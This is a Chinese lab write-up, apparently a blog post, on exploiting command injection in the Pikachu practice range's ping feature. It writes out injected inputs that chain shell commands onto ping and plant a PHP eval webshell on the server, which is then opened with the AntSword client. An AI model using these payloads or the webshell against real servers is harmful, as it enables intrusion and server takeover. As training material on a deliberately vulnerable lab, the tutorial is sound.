pikachu靶场 利用Rce上传一句话木马案例(工具:中国蚁剑)

目录

一、准备靶场,进入RCE

二、测试写入文件

三、使用中国蚁剑


一、准备靶场,进入RCE

我这里用的是pikachu

打开pikachu靶场,选择 RCE > exec "ping"

 测试是否存在 Rce 漏洞

因为我们猜测在这个 ping 功能是直接调用系统的 ping 命令,如:

ping (输入框的内容)

那我们就可以利用这个构造恶意指令,

当我们的输入框内填入 “localhost | ipconfig”时,执行的指令为:

ping localhost | ipconfig

可是经过测试发现并没有回显,执行后并无反应

二、测试写入文件

我们尝试写入文件:

当我们的输入框内填入 “localhost | echo 999>2.php”时,执行的指令为:

ping localhost | echo 999>2.php

点击ping,此时界面还是只刷新了一下,并没有明显反应。

我们查看一下是否写入成功,访问http://你的ip:你的端口/vul/rce/2.php

很明显写入成功,那我们尝试写入我们的一句话木马:

Windows和Linux下写入一句话PHP木马echo命令总结

当我们的输入框内填入 “localhost | echo '<?php eval($_REQUEST[74])?>' >s.php”(中括号内的74可以换成你的密码)时,执行的指令为:

ping localhost | echo '<?php eval($_REQUEST[74])?>' >s.php

访问http://你的ip:你的端口/vul/rce/s.php,发现一片空白,说明写入成功。因为如果服务器没文件应该会报“/vul/rce/s1.php was not found

三、使用中国蚁剑

打开中国蚁剑,右键添加数据:

输入一句话木马的url:

拿下:

  • 8
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Pikachu靶场中的RCE指的是远程命令/代码执行漏洞。该漏洞存在于Pikachu靶场的第1关和第2关中。在第1关中,通过对"exec "ping""命令的源码分析可以了解到该漏洞的详细信息。在代码中,将用户输入的IP地址赋值给变量$ip,并直接将其传入shell_exec()函数执行,导致命令可被拼接并执行。 在第2关的"exec "eval""中也存在远程命令/代码执行漏洞。具体源码分析未提供,但可以推测该漏洞的原理类似于第1关中的RCE漏洞。 总之,Pikachu靶场中的RCE漏洞给黑客提供了可以远程执行任意命令或代码的机会,这对Web应用系统的安全性构成了严重威胁。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [Pikachu靶场RCE漏洞详解](https://blog.csdn.net/m0_46467017/article/details/124838779)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [pikachu.rar](https://download.csdn.net/download/weixin_45663905/12742070)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值